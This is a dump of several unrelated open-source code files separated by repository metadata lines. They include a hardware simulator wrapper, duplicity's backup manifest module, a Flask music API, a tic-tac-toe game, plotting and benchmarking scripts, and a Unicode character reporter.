'mono-frame.data-False-0.png', np.reshape(frame.data(False, 0), frame_shape)[:, :, :3] ) elif self.current == 2: # the two calls below save the two stereo frames, # however the data needs to be reshaped, as the # call to the data method yields a flat NumPy array cv2.imwrite( 'stereo-frame.data-False-0.png', np.reshape(frame.data(False, 0), frame_shape)[:, :, :3] ) cv2.imwrite( 'stereo-frame.data-False-1.png', np.reshape(frame.data(False, 1), frame_shape)[:, :, :3] ) elif self.current == 3: # the two calls below save the two stereo frames, # without the need for reshaping the data, as the # call to the data method already yields a # structured NumPy array cv2.imwrite( 'mono-frame.data-True.png', frame.data(True)[:, :, :3] ) cv2.imwrite( 'mono-frame.data-True-0.png', frame.data(True, 0)[:, :, :3] ) elif self.current == 4: # the two calls below save the two stereo frames, # without the need for reshaping the data, as the # call to the data method already yields a # structured NumPy array cv2.imwrite( 'stereo-frame.data-True-0.png', frame.data(True, 0)[:, :, :3] ) cv2.imwrite( 'stereo-frame.data-True-1.png', frame.data(True, 1)[:, :, :3] ) if __name__ == '__main__': sfac = VideoSourceFactory.get_instance() source = sfac.get_device( Device.DeckLink4KExtreme12G, ColourSpace.BGRA ) saver = StereoFrameSaver() source.attach(saver) time.sleep(2) # operate pipeline for 2 sec source.detach(saver)
bsd-3-clause
-5,324,610,510,568,604,000
32.269231
71
0.52
false
4.080189
false
false
false
arcade-lab/tia-infrastructure
tools/simulator/system.py
1
9352
""" Top-level system wrapper. """ import re import sys import pandas as pd from simulator.exception import SimulatorException class System: """ A system class to wrap a collection of processing and memory elements as well as the channels through which they communicate. """ def __init__(self): """ Empty system. """ # Start at the zeroth cycle, and initialize system elements as empty lists to allow for appends. self.cycle = 0 self.processing_elements = [] self.memories = [] self.buffers = [] # Add hierarchical elements for easier access. self.quartets = [] self.blocks = [] self.arrays = [] # --- Time-stepping Method --- def iterate(self, interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace): """ Move ahead one clock cycle, period or whatever you want to call it (this is a functional simulator). :param interactive: waiting on the user at each cycle :param show_processing_elements: showing processing element information :param show_memories: showing memory element information :param show_buffers: showing channel information :return: whether the system has halted """ # Initially, assume the system is halting this cycle. halt = True # Print out a debug header, if requested. if interactive or show_processing_elements or show_memories or show_buffers: print(f"\n--- Cycle: {self.cycle} ---\n") # Perform local processing element operations. if show_processing_elements: print("Processing Elements\n") for processing_element in self.processing_elements: processing_element.iterate(show_processing_elements, keep_execution_trace) for processing_element in self.processing_elements: halt &= processing_element.core.halt_register # Only halt if all processing elements have halted. # Perform memory operations. if show_memories: print("Memories\n") for memory in self.memories: memory.iterate(show_memories) # Commit all pending buffer transactions. if show_buffers: print("Buffers\n") for buffer in self.buffers: buffer.commit(show_buffers) halt &= buffer.empty # Only halt the system if all buffers are empty. # Move time forward assuming we are not halting. if not halt: self.cycle += 1 # Return whether we should halt. return halt # --- Display Methods --- def halt_message(self): """ Print a message showing the state of the system upon halting. """ # Formatted message. print(f"\n--- System halted after {self.cycle} cycles. ---\n") print("Final Memory Layout\n") for memory in self.memories: print(f"name: {memory.name}") print("contents:") i = 0 while i < 10: if i < len(memory.contents): print(f"0x{memory.contents[i]:08x}") else: break i += 1 if len(memory.contents) > 10: print("...\n") else: print("bound\n") def interrupted_message(self): """ Print a message showing the state of the system upon being interrupted by the user in a simulation. :param self: system wrapper """ # Formatted message. print(f"\n--- System interrupted after {self.cycle} cycles. ---\n") print("Final Memory Layout\n") for memory in self.memories: print(f"name: {memory.name}") print("contents:") i = 0 while i < 10: if i < len(memory.contents): print(f"0x{memory.contents[i]:08x}") else: break i += 1 if len(memory.contents) > 10: print("...\n") else: print("bound\n") # --- Top-level Methods --- def register(self, element): """ Register a functional unit (processing element, memory, etc.) with the event loop. :param element: functional unit """ # Make sure the functional unit has a special registration method. registration_operation = getattr(element, "_register") if not callable(registration_operation): exception_string = f"The functional unit of type {type(element)} does not have internal system " \ + f"registration method." raise SimulatorException(exception_string) # Call the functional unit's internal method. element._register(self) def finalize(self): """ Alphabetize components in the event loop for clean debug output and make sure all processing elements are indexed. """ # The numerical strings are the ones we care about. def natural_number_sort_key(entity): name = entity.name key_string_list = re.findall(r"(\d+)", name) if len(key_string_list) > 0: return [int(key_string) for key_string in key_string_list] else: return [] # Sort all the entities. self.processing_elements = sorted(self.processing_elements, key=natural_number_sort_key) for i, processing_element in enumerate(self.processing_elements): if processing_element.name != f"processing_element_{i}": exception_string = f"Missing processing element {i}." raise SimulatorException(exception_string) self.memories = sorted(self.memories, key=natural_number_sort_key) self.buffers = sorted(self.buffers, key=natural_number_sort_key) def run(self, interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace): """ Execute until the system halts or a user issues an interrupt or writes an EOF. :param interactive: whether to wait for user input on each cycle :param show_processing_elements: whether to show processing element status each cycle :param show_memories: whether to show a summary of the memory contents each cycle :param show_buffers: whether to show channel state each cycle :param keep_execution_trace: whether to keep a running log of executed instructions on each processing element :return: whether the system has halted and whether it was interrupted """ # Simple event/read-evaluate loop. halt = False interrupted = False while True: try: if interactive: if self.cycle > 0: user_input = input("Press [Enter] to continue. Type \"exit\", or use [Ctrl-C] o [Ctrl-D] to " + "exit.\n").strip() if user_input == "exit": break elif user_input != "": print(f"Unrecognized command: {user_input}.", file=sys.stderr) halt = self.iterate(interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace) if halt: self.halt_message() break except (KeyboardInterrupt, EOFError): interrupted = True self.interrupted_message() break # Return the status flags. return halt, interrupted def reset_processing_elements(self): """ Reset all the processing elements in a system. """ # Use the reset() methods built in to the processing elements. for processing_element in self.processing_elements: processing_element.reset() def reset_memories(self): """ Reset all the memories in a system. """ # Use the reset() methods built in to the memories. for memory in self.memories: memory.reset() def reset_buffers(self): """ Reset all the buffers in a system. """ # Use the buffers' own reset() methods. for buffer in self.buffers: buffer.reset() def reset(self): """ Reset all the processing elements, memories and buffers. """ # Just wrap our own methods. self.reset_processing_elements() self.reset_memories() self.reset_buffers() @property def processing_element_traces(self): # Return a dictionary of execution traces. return {processing_element.name: processing_element.core.execution_trace for processing_element in self.processing_elements} @property def processing_element_traces_as_data_frame(self): # For convenient CSV output and analysis. return pd.DataFrame(self.processing_element_traces)
mit
3,835,425,596,161,252,000
34.558935
118
0.572391
false
4.752033
false
false
false
Mariaanisimova/pythonintask
IVTp/2014/Shcherbakov_R_A/task_12_22.py
1
1719
# Задача 12. Вариант 22. # Разработайте игру "Крестики-нолики". (см. М.Доусон Программируем на Python # гл. 6). # Щербаков Р.А. # 22.05.2016 print(""" Добро пожаловать на игру крестики нолики чтобы сделать ход введите число от 0 до 8 0 | 1 | 2 --------- 3 | 4 | 5 --------- 6 | 7 | 8""") doska=["-","-","-","-","-","-","-","-","-"] bol=True wins=False schet=0 def disp(doska): print("\n\t"+doska[0]+" | "+doska[1]+" | "+doska[2]+"\n\t---------"+ "\n\t"+doska[3]+" | "+doska[4]+" | "+doska[5]+"\n\t---------"+ "\n\t"+doska[6]+" | "+doska[7]+" | "+doska[8]+"\n\t---------") def win(doska): twin=((0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6)) for row in twin: if doska[row[0]]==doska[row[1]]==doska[row[2]]!="-": return True while wins!=True: if(schet==5): break if(bol): n1=input("\nХод игрока 1: ") if(doska[int(n1)]=="-"): doska[int(n1)]="X" disp(doska) bol=False wins=win(doska) schet+=1 else: print("Занято") else: n2=input("\nХод игрока 2: ") if(doska[int(n2)]=="-"): doska[int(n2)]="O" disp(doska) bol=True wins=win(doska) else: print("Занято") if(wins and bol): print("Победил игрок 2") elif(wins and not bol): print("Победил игрок 1") else: print("Ничья") input("Ok")
apache-2.0
7,851,925,064,230,096,000
25.137931
76
0.446205
false
2.092541
false
false
false
muff1nman/duplicity
duplicity/manifest.py
1
16791
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*- # # Copyright 2002 Ben Escoto <ben@emerose.org> # Copyright 2007 Kenneth Loafman <kenneth@loafman.com> # # This file is part of duplicity. # # Duplicity is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 2 of the License, or (at your # option) any later version. # # Duplicity is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with duplicity; if not, write to the Free Software Foundation, # Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA """Create and edit manifest for session contents""" from future_builtins import filter import re from duplicity import log from duplicity import globals from duplicity import util class ManifestError(Exception): """ Exception raised when problem with manifest """ pass class Manifest: """ List of volumes and information about each one """ def __init__(self, fh=None): """ Create blank Manifest @param fh: fileobj for manifest @type fh: DupPath @rtype: Manifest @return: manifest """ self.hostname = None self.local_dirname = None self.volume_info_dict = {} # dictionary vol numbers -> vol infos self.fh = fh self.files_changed = [] def set_dirinfo(self): """ Set information about directory from globals, and write to manifest file. @rtype: Manifest @return: manifest """ self.hostname = globals.hostname self.local_dirname = globals.local_path.name # @UndefinedVariable if self.fh: if self.hostname: self.fh.write("Hostname %s\n" % self.hostname) if self.local_dirname: self.fh.write("Localdir %s\n" % Quote(self.local_dirname)) return self def check_dirinfo(self): """ Return None if dirinfo is the same, otherwise error message Does not raise an error message if hostname or local_dirname are not available. @rtype: string @return: None or error message """ if globals.allow_source_mismatch: return if self.hostname and self.hostname != globals.hostname: errmsg = _("Fatal Error: Backup source host has changed.\n" "Current hostname: %s\n" "Previous hostname: %s") % (globals.hostname, self.hostname) code = log.ErrorCode.hostname_mismatch code_extra = "%s %s" % (util.escape(globals.hostname), util.escape(self.hostname)) elif (self.local_dirname and self.local_dirname != globals.local_path.name): # @UndefinedVariable errmsg = _("Fatal Error: Backup source directory has changed.\n" "Current directory: %s\n" "Previous directory: %s") % (globals.local_path.name, self.local_dirname) # @UndefinedVariable code = log.ErrorCode.source_dir_mismatch code_extra = "%s %s" % (util.escape(globals.local_path.name), util.escape(self.local_dirname)) # @UndefinedVariable else: return log.FatalError(errmsg + "\n\n" + _("Aborting because you may have accidentally tried to " "backup two different data sets to the same remote " "location, or using the same archive directory. If " "this is not a mistake, use the " "--allow-source-mismatch switch to avoid seeing this " "message"), code, code_extra) def set_files_changed_info(self, files_changed): if files_changed: self.files_changed = files_changed if self.fh: self.fh.write("Filelist %d\n" % len(self.files_changed)) for fileinfo in self.files_changed: self.fh.write(" %-7s %s\n" % (fileinfo[1], Quote(fileinfo[0]))) def add_volume_info(self, vi): """ Add volume info vi to manifest and write to manifest @param vi: volume info to add @type vi: VolumeInfo @return: void """ vol_num = vi.volume_number self.volume_info_dict[vol_num] = vi if self.fh: self.fh.write(vi.to_string() + "\n") def del_volume_info(self, vol_num): """ Remove volume vol_num from the manifest @param vol_num: volume number to delete @type vi: int @return: void """ try: del self.volume_info_dict[vol_num] except Exception: raise ManifestError("Volume %d not present in manifest" % (vol_num,)) def to_string(self): """ Return string version of self (just concatenate vi strings) @rtype: string @return: self in string form """ result = "" if self.hostname: result += "Hostname %s\n" % self.hostname if self.local_dirname: result += "Localdir %s\n" % Quote(self.local_dirname) result += "Filelist %d\n" % len(self.files_changed) for fileinfo in self.files_changed: result += " %-7s %s\n" % (fileinfo[1], Quote(fileinfo[0])) vol_num_list = self.volume_info_dict.keys() vol_num_list.sort() def vol_num_to_string(vol_num): return self.volume_info_dict[vol_num].to_string() result = "%s%s\n" % (result, "\n".join(map(vol_num_to_string, vol_num_list))) return result __str__ = to_string def from_string(self, s): """ Initialize self from string s, return self """ def get_field(fieldname): """ Return the value of a field by parsing s, or None if no field """ m = re.search("(^|\\n)%s\\s(.*?)\n" % fieldname, s, re.I) if not m: return None else: return Unquote(m.group(2)) self.hostname = get_field("hostname") self.local_dirname = get_field("localdir") # Get file changed list filelist_regexp = re.compile("(^|\\n)filelist\\s([0-9]+)\\n(.*?)(\\nvolume\\s|$)", re.I | re.S) match = filelist_regexp.search(s) filecount = 0 if match: filecount = int(match.group(2)) if filecount > 0: def parse_fileinfo(line): fileinfo = line.strip().split() return (fileinfo[0], ''.join(fileinfo[1:])) self.files_changed = list(map(parse_fileinfo, match.group(3).split('\n'))) assert filecount == len(self.files_changed) next_vi_string_regexp = re.compile("(^|\\n)(volume\\s.*?)" "(\\nvolume\\s|$)", re.I | re.S) starting_s_index = 0 highest_vol = 0 latest_vol = 0 while 1: match = next_vi_string_regexp.search(s[starting_s_index:]) if not match: break vi = VolumeInfo().from_string(match.group(2)) self.add_volume_info(vi) highest_vol = max(highest_vol, vi.volume_number) latest_vol = vi.volume_number starting_s_index += match.end(2) # If we restarted after losing some remote volumes, the highest volume # seen may be higher than the last volume recorded. That is, the # manifest could contain "vol1, vol2, vol3, vol2." If so, we don't # want to keep vol3's info. for i in range(latest_vol + 1, highest_vol + 1): self.del_volume_info(i) return self def get_files_changed(self): return self.files_changed def __eq__(self, other): """ Two manifests are equal if they contain the same volume infos """ vi_list1 = self.volume_info_dict.keys() vi_list1.sort() vi_list2 = other.volume_info_dict.keys() vi_list2.sort() if vi_list1 != vi_list2: log.Notice(_("Manifests not equal because different volume numbers")) return False for i in range(len(vi_list1)): if not vi_list1[i] == vi_list2[i]: log.Notice(_("Manifests not equal because volume lists differ")) return False if (self.hostname != other.hostname or self.local_dirname != other.local_dirname): log.Notice(_("Manifests not equal because hosts or directories differ")) return False return True def __ne__(self, other): """ Defines !=. Not doing this always leads to annoying bugs... """ return not self.__eq__(other) def write_to_path(self, path): """ Write string version of manifest to given path """ assert not path.exists() fout = path.open("wb") fout.write(self.to_string()) assert not fout.close() path.setdata() def get_containing_volumes(self, index_prefix): """ Return list of volume numbers that may contain index_prefix """ return filter(lambda vol_num: self.volume_info_dict[vol_num].contains(index_prefix), self.volume_info_dict.keys()) class VolumeInfoError(Exception): """ Raised when there is a problem initializing a VolumeInfo from string """ pass class VolumeInfo: """ Information about a single volume """ def __init__(self): """VolumeInfo initializer""" self.volume_number = None self.start_index = None self.start_block = None self.end_index = None self.end_block = None self.hashes = {} def set_info(self, vol_number, start_index, start_block, end_index, end_block): """ Set essential VolumeInfo information, return self Call with starting and ending paths stored in the volume. If a multivol diff gets split between volumes, count it as being part of both volumes. """ self.volume_number = vol_number self.start_index = start_index self.start_block = start_block self.end_index = end_index self.end_block = end_block return self def set_hash(self, hash_name, data): """ Set the value of hash hash_name (e.g. "MD5") to data """ self.hashes[hash_name] = data def get_best_hash(self): """ Return pair (hash_type, hash_data) SHA1 is the best hash, and MD5 is the second best hash. None is returned if no hash is available. """ if not self.hashes: return None try: return ("SHA1", self.hashes['SHA1']) except KeyError: pass try: return ("MD5", self.hashes['MD5']) except KeyError: pass return self.hashes.items()[0] def to_string(self): """ Return nicely formatted string reporting all information """ def index_to_string(index): """Return printable version of index without any whitespace""" if index: s = "/".join(index) return Quote(s) else: return "." slist = ["Volume %d:" % self.volume_number] whitespace = " " slist.append("%sStartingPath %s %s" % (whitespace, index_to_string(self.start_index), (self.start_block or " "))) slist.append("%sEndingPath %s %s" % (whitespace, index_to_string(self.end_index), (self.end_block or " "))) for key in self.hashes: slist.append("%sHash %s %s" % (whitespace, key, self.hashes[key])) return "\n".join(slist) __str__ = to_string def from_string(self, s): """ Initialize self from string s as created by to_string """ def string_to_index(s): """ Return tuple index from string """ s = Unquote(s) if s == ".": return () return tuple(s.split("/")) linelist = s.strip().split("\n") # Set volume number m = re.search("^Volume ([0-9]+):", linelist[0], re.I) if not m: raise VolumeInfoError("Bad first line '%s'" % (linelist[0],)) self.volume_number = int(m.group(1)) # Set other fields for line in linelist[1:]: if not line: continue line_split = line.strip().split() field_name = line_split[0].lower() other_fields = line_split[1:] if field_name == "Volume": log.Warn(_("Warning, found extra Volume identifier")) break elif field_name == "startingpath": self.start_index = string_to_index(other_fields[0]) if len(other_fields) > 1: self.start_block = int(other_fields[1]) else: self.start_block = None elif field_name == "endingpath": self.end_index = string_to_index(other_fields[0]) if len(other_fields) > 1: self.end_block = int(other_fields[1]) else: self.end_block = None elif field_name == "hash": self.set_hash(other_fields[0], other_fields[1]) if self.start_index is None or self.end_index is None: raise VolumeInfoError("Start or end index not set") return self def __eq__(self, other): """ Used in test suite """ if not isinstance(other, VolumeInfo): log.Notice(_("Other is not VolumeInfo")) return None if self.volume_number != other.volume_number: log.Notice(_("Volume numbers don't match")) return None if self.start_index != other.start_index: log.Notice(_("start_indicies don't match")) return None if self.end_index != other.end_index: log.Notice(_("end_index don't match")) return None hash_list1 = self.hashes.items() hash_list1.sort() hash_list2 = other.hashes.items() hash_list2.sort() if hash_list1 != hash_list2: log.Notice(_("Hashes don't match")) return None return 1 def __ne__(self, other): """ Defines != """ return not self.__eq__(other) def contains(self, index_prefix, recursive=1): """ Return true if volume might contain index If recursive is true, then return true if any index starting with index_prefix could be contained. Otherwise, just check if index_prefix itself is between starting and ending indicies. """ if recursive: return (self.start_index[:len(index_prefix)] <= index_prefix <= self.end_index) else: return self.start_index <= index_prefix <= self.end_index nonnormal_char_re = re.compile("(\\s|[\\\\\"'])") def Quote(s): """ Return quoted version of s safe to put in a manifest or volume info """ if not nonnormal_char_re.search(s): return s # no quoting necessary slist = [] for char in s: if nonnormal_char_re.search(char): slist.append("\\x%02x" % ord(char)) else: slist.append(char) return '"%s"' % "".join(slist) def Unquote(quoted_string): """ Return original string from quoted_string produced by above """ if not quoted_string[0] == '"' or quoted_string[0] == "'": return quoted_string assert quoted_string[0] == quoted_string[-1] return_list = [] i = 1 # skip initial char while i < len(quoted_string) - 1: char = quoted_string[i] if char == "\\": # quoted section assert quoted_string[i + 1] == "x" return_list.append(chr(int(quoted_string[i + 2:i + 4], 16))) i += 4 else: return_list.append(char) i += 1 return "".join(return_list)
gpl-2.0
-1,987,972,922,932,362,800
32.183794
128
0.546602
false
4.071532
false
false
false
karpeev/libmesh
doc/statistics/libmesh_citations.py
1
2340
#!/usr/bin/env python import matplotlib.pyplot as plt import numpy as np # Number of "papers using libmesh" by year. # # Note 1: this does not count citations "only," the authors must have actually # used libmesh in part of their work. Therefore, these counts do not include # things like Wolfgang citing us in his papers to show how Deal.II is # superior... # # Note 2: I typically update this data after regenerating the web page, # since bibtex2html renumbers the references starting from "1" each year. # # Note 3: These citations include anything that is not a dissertation/thesis. # So, some are conference papers, some are journal articles, etc. # # Note 4: The libmesh paper came out in 2006, but there are some citations # prior to that date, obviously. These counts include citations of the # website libmesh.sf.net as well... # # Note 5: Preprints are listed as the "current year + 1" and are constantly # being moved to their respective years after being published. data = [ '2004', 5, '\'05', 2, '\'06', 13, '\'07', 8, '\'08', 23, '\'09', 30, '\'10', 24, '\'11', 37, '\'12', 50, '\'13', 78, '\'14', 62, '\'15', 24, 'P', 5, # Preprints 'T', 38 # Theses ] # Extract the x-axis labels from the data array xlabels = data[0::2] # Extract the publication counts from the data array n_papers = data[1::2] # The number of data points N = len(xlabels); # Get a reference to the figure fig = plt.figure() # 111 is equivalent to Matlab's subplot(1,1,1) command ax = fig.add_subplot(111) # Create an x-axis for plotting x = np.linspace(1, N, N) # Width of the bars width = 0.8 # Make the bar chart. Plot years in blue, preprints and theses in green. ax.bar(x[0:N-2], n_papers[0:N-2], width, color='b') ax.bar(x[N-2:N], n_papers[N-2:N], width, color='g') # Label the x-axis plt.xlabel('P=Preprints, T=Theses') # Set up the xtick locations and labels. Note that you have to offset # the position of the ticks by width/2, where width is the width of # the bars. ax.set_xticks(np.linspace(1,N,N) + width/2) ax.set_xticklabels(xlabels) # Create a title string title_string = 'LibMesh Citations, (' + str(sum(n_papers)) + ' Total)' fig.suptitle(title_string) # Save as PDF plt.savefig('libmesh_citations.pdf') # Local Variables: # python-indent: 2 # End:
lgpl-2.1
-5,032,296,851,778,894,000
26.529412
78
0.674359
false
2.962025
false
false
false
meisterluk/print-nonascii.py
printnonascii/char.py
1
2308
#!/usr/bin/env python3 class Character: def __init__(self, c): self.character = c self.unicode_point = None self.lineno = None self.colno = None self.category = None self.description = None self.line = None def asciionly(self): assert self.description or self.unicode_point if self.description is not None and self.unicode_point is not None: out = '{} {}'.format(self.unicode_point, self.description) elif self.description: out = '{}'.format(self.description) elif self.unicode_point is not None: out = '{}'.format(self.unicode_point) if self.category is not None: out += ' of category {}'.format(self.category) if self.lineno is not None: out += ' at line {}'.format(self.lineno) elif self.colno is not None: out += ' at column {}'.format(self.colno) return out @staticmethod def make_pointer(line, colno): out = '' for idx in range(len(line)): if idx == colno: break elif line[idx] == '\t': out += '\t' else: out += '─' return out + '⬏' def __str__(self): out = '' if self.line is not None and self.colno is not None: leading_ws = max(len(str(self.lineno)), 3) tmpl = '{: <' + str(leading_ws) + 'd}: {}' out += tmpl.format(self.lineno, self.line) out += ' ' * leading_ws + ': ' out += self.make_pointer(self.line, self.colno) out += '\n\n' out += "{} ".format(self.character) if self.unicode_point: out += '{} '.format(self.unicode_point) if self.lineno is not None and self.colno is not None: out += '(line {}, col {})'.format(self.lineno, self.colno) elif self.lineno is not None: out += '(line {})'.format(self.lineno) elif self.colno is not None: out += '(col {})'.format(self.colno) out += "\n" if self.category: out += " category: {}\n".format(self.category) out += " name: {}\n".format(self.description) out += "\n" return out
bsd-3-clause
-7,909,865,003,349,707,000
30.135135
75
0.503906
false
3.891892
false
false
false
building4theweb/soundem-api
soundem/views.py
1
5875
from flask import g, jsonify, request, abort from flask_cors import cross_origin from soundem import app from .decorators import auth_token_required from .models import Artist, Album, Song, User @app.route('/api/v1/login', methods=['POST']) @cross_origin(headers=['Content-Type', 'Authorization']) def login(): data = request.get_json() or {} email = data.get('email') password = data.get('password') errors = {} if not email: errors['email'] = 'Field is required.' if not password: errors['password'] = 'Field is required.' user = User.find_by_email(email) if not user: errors['email'] = 'User does not exist.' elif not user.check_password(password): errors['password'] = 'Invalid password.' if errors: return jsonify({'errors': errors}), 400 user_data = { 'id': user.id, 'email': user.email, 'token': user.get_auth_token() } return jsonify({'user': user_data}) @app.route('/api/v1/register', methods=['POST']) @cross_origin(headers=['Content-Type', 'Authorization']) def register(): data = request.get_json() or {} email = data.get('email') password = data.get('password') errors = {} if not email: errors['email'] = 'Field is required.' if not password: errors['password'] = 'Field is required.' existing_user = User.find_by_email(email) if existing_user: errors['email'] = 'Email is already taken' if errors: return jsonify({'errors': errors}), 400 user = User.create(email=email, password=password) user_data = { 'id': user.id, 'email': user.email, 'token': user.get_auth_token() } return jsonify({'user': user_data}), 201 @app.route('/api/v1/artists', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_artists(): artists_results = [] for artist in Artist.get_all(): artists_results.append({ 'id': artist.id, 'name': artist.name, 'bio': artist.bio, 'albums': [album.id for album in artist.albums.all()] }) return jsonify({'artists': artists_results}) @app.route('/api/v1/artists/<int:artist_id>', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_artist(artist_id): artist = Artist.get(artist_id) if not artist: abort(404) artist_data = { 'id': artist.id, 'name': artist.name, 'bio': artist.bio, 'albums': [album.id for album in artist.albums.all()] } return jsonify({'artist': artist_data}) @app.route('/api/v1/albums', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_albums(): albums_results = [] for album in Album.get_all(): albums_results.append({ 'id': album.id, 'name': album.name, 'artworkURL': album.artwork_url, 'artist': album.artist_id, 'songs': [song.id for song in album.songs.all()] }) return jsonify({'albums': albums_results}) @app.route('/api/v1/albums/<int:album_id>', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_album(album_id): album = Album.get(album_id) if not album: abort(404) album_data = { 'id': album.id, 'name': album.name, 'artworkURL': album.artwork_url, 'artist': album.artist_id, 'songs': [song.id for song in album.songs.all()] } return jsonify({'album': album_data}) @app.route('/api/v1/songs', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def get_songs(): songs_results = [] favorite = request.args.get('favorite') song_ids = request.args.getlist('ids[]') if favorite == 'true': songs = Song.get_favorites(g.user) elif song_ids: songs = Song.filter_by_ids(song_ids) else: songs = Song.get_all() for song in songs: songs_results.append({ 'id': song.id, 'name': song.name, 'album': song.album.id, 'favorite': song.is_favorited(g.user), 'duration': song.duration, 'url': song.url }) return jsonify({'songs': songs_results}) @app.route('/api/v1/songs/<int:song_id>', methods=['GET', 'PUT']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def song(song_id): song = Song.get(song_id) is_favorited = None if not song: abort(404) if request.method == 'PUT': data = request.get_json() or {} data_song = data.get('song') or {} favorite = data_song.get('favorite') if favorite is not None: # Update song if favorite param was sent is_favorited = song.set_favorite(g.user, favorite) else: song = Song.get(song_id) if is_favorited is None: # Check if song was favorited is_favorited = song.is_favorited(g.user) song_data = { 'id': song.id, 'name': song.name, 'album': song.album.id, 'favorite': is_favorited, 'duration': song.duration, 'url': song.url } return jsonify({'song': song_data}) @app.route('/api/v1/users/<int:user_id>', methods=['GET']) @cross_origin(headers=['Content-Type', 'Authorization']) @auth_token_required def user(user_id): user = g.user if user.id != user_id: abort(403) user_data = { 'id': user.id, 'email': user.email, 'songTotal': Song.total_count(), 'albumTotal': Album.total_count(), 'durationTotal': Song.total_duration() } return jsonify({'user': user_data})
mit
6,891,862,848,539,757,000
24.323276
65
0.584
false
3.459953
false
false
false
notkarol/banjin
experiment/python_word_matching_speed.py
1
4650
#!/usr/bin/python # Takes in a dictionary of words # Verifies that all functions return the same answers # Generates random hands from the probability of getting tiles from the bunch # Then prints out how long each function takes to find all matching words # Generates various hand sizes to see if there's any scaling import matplotlib.pyplot as plt import numpy as np import pickle import os import sys import timeit # Naive list way of matching wordbank def f0_list(hand, wordbank): results = [] for w_i in range(len(wordbank)): match = True for i in range(26): if hand[i] < wordbank[w_i][i]: match = False break if match: results.append(w_i) return results # A for loop and some numpy def f1_list(hand, wordbank): results = [] for w_i in range(len(wordbank)): if min(list(map(lambda x: x[1] - x[0], zip(wordbank[w_i], hand)))) >= 0: results.append(w_i) return results # Naive way using numpy def f0_np(hand, wordbank): results = [] for w_i in range(len(wordbank)): match = True for i in range(26): if hand[i] < wordbank[w_i,i]: match = False break if match: results.append(w_i) return results # A for loop and some numpy def f1_np(hand, wordbank): results = [] for w_i in range(len(wordbank)): if not np.any((hand - wordbank[w_i]) < 0): results.append(w_i) return results # A for loop and some numpy def f2_np(hand, wordbank): results = [] for w_i in range(len(wordbank)): if np.min(hand - wordbank[w_i]) >= 0: results.append(w_i) return results # Vectorized sum and difference def f3_np(hand, wordbank): return np.where(np.sum((wordbank - hand) > 0, axis=1) == 0)[0] # vectorized just using any def f4_np(hand, wordbank): return np.where(np.any(wordbank > hand, axis=1) == 0)[0] # Prepare a 2D list and a 2D np array of letter frequencies with open(sys.argv[1]) as f: words = [x.split()[0] for x in f.readlines()] wordbank_list = [[0] * 26 for _ in range(len(words))] wordbank_np = np.zeros((len(words), 26)) for w_i in range(len(words)): for letter in sorted(words[w_i]): pos = ord(letter) - 65 wordbank_list[w_i][pos] += 1 wordbank_np[w_i][pos] += 1 # Arrays for keeping track of functions and data-specific wordbanks hand_sizes = list(range(2, 9)) functions = {'list' : [f0_list, f1_list], 'numpy': [f0_np, f1_np, f2_np, f3_np, f4_np]} wordbanks = {'list' : wordbank_list, 'numpy': wordbank_np} n_iter = 10 if len(sys.argv) < 3 else int(sys.argv[2]) timings = {} for datatype in functions: timings[datatype] = np.zeros((max(hand_sizes) + 1, n_iter, len(functions[datatype]))) # Verify that our functions give the same answers for datatype in functions: for func in functions[datatype]: print(datatype, func(wordbanks[datatype][len(wordbank_list) // 2], wordbanks[datatype])) # Time each word imports = 'from __main__ import functions, wordbanks' for counter in range(n_iter): for hand_size in hand_sizes: # Get a specific hand size hand = [13,3,3,6,18,3,4,3,12,2,2,5,3,8,11,3,2,9,6,9,6,3,3,2,3,2] while sum(hand) > hand_size: pos = np.random.randint(sum(hand)) for i in range(len(hand)): pos -= hand[i] if pos < 0: hand[i] -= 1 break hand = str(hand) # For this hand go wild for datatype in functions: for f_i in range(len(functions[datatype])): cmd = 'functions["%s"][%i](%s, wordbanks["%s"])' % (datatype, f_i, hand, datatype) timings[datatype][hand_size, counter, f_i] += timeit.timeit(cmd, imports, number=8) print("\rCompleted %.1f%%" % (100 * (counter + 1) / n_iter), end='') print() # Save words and timings in case we're doing a long-lasting operation filename = 'word_matching_timings_%s.pkl' % os.path.basename(sys.argv[1]) with open(filename, 'wb') as f: print("Saving", filename) pickle.dump((words, wordbanks, timings), f) # Show Results for datatype in functions: means = np.mean(timings[datatype], axis=1) for f_i in range(means.shape[1]): plt.semilogy(hand_sizes, means[:, f_i][min(hand_sizes):], label='%s F%i' % (datatype, f_i)) plt.legend(loc='center left', bbox_to_anchor=(0.85, 0.5)) plt.xlabel("Hand Size") plt.ylabel("Execution Time") plt.title("Word Matching") plt.show()
mit
6,223,729,968,353,600,000
29.794702
99
0.60043
false
3.144016
false
false
false
asweigart/pyganim
examples/sprite_sheet_demo.py
1
1276
